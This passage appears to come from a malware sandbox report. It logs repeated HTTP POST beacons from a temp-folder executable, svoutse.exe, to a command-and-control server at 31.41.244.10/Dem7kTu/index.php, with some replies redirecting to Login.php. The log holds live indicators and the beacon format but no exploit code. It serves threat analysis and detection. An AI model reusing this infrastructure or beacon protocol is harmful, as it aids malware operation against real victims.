Sep 6, 2024 09:58:56.408277988 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:56.635898113 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:56 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.7	49853	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:56.767987967 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:57.491254091 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:57.492048979 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:57.724163055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.7	49857	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:57.846756935 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:58.540326118 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:58.542036057 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:58.768167019 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.7	49863	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:58.875188112 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:58:59.586487055 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:58:59.587383032 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:58:59.815983057 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:58:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.7	49867	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:58:59.941196918 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:00.640868902 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:00.642628908 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:00.868407011 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.7	49870	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:00.991646051 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:01.701314926 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:01.702423096 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:01.927808046 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.7	49871	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:02.044225931 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:02.812335968 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:02.815664053 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:03.108643055 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.7	49873	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:03.259752035 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:04.283353090 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:04.294066906 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:04.565701008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.7	49874	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:04.679124117 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:05.456711054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.7	49875	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:05.466120005 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:06.267957926 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.7	49876	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:06.390897989 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:07.491403103 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 6, 2024 09:59:07.494304895 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.7	49877	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:07.501009941 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:08.250721931 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.7	49878	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:08.378323078 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:09.136487007 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.7	49879	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:09.146512032 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:10.057269096 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
67	192.168.2.7	49880	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:10.179868937 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:11.393089056 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
68	192.168.2.7	49881	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:11.402122974 CEST	313	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 162 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 42 37 39 43 32 37 43 33 31 36 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 38 42 34 32 41 37 30 42 35 35 42 38 32 44 31 32 46 43 34 37 44 42 32 33 43 41 39 36 34 46 46 35 36 34 43 33 38 42 33 37 33 37 30 33 35 42 31 45 36 30 43 38 44 30 45 39 33 39 46 42 36 30 38 42 45 43 35 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8B79C27C31648B140BE1D46450FC9DDF642E3BDD70A78B42A70B55B82D12FC47DB23CA964FF564C38B3737035B1E60C8D0E939FB608BEC5
Sep 6, 2024 09:59:12.212219000 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
69	192.168.2.7	49882	31.41.244.10	80	7616	C:\Users\user\AppData\Local\Temp\0e8d0864aa\svoutse.exe

Timestamp	Bytes transferred	Direction	Data
Sep 6, 2024 09:59:12.331861019 CEST	153	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 31.41.244.10 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 6, 2024 09:59:13.148552895 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 06 Sep 2024 07:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
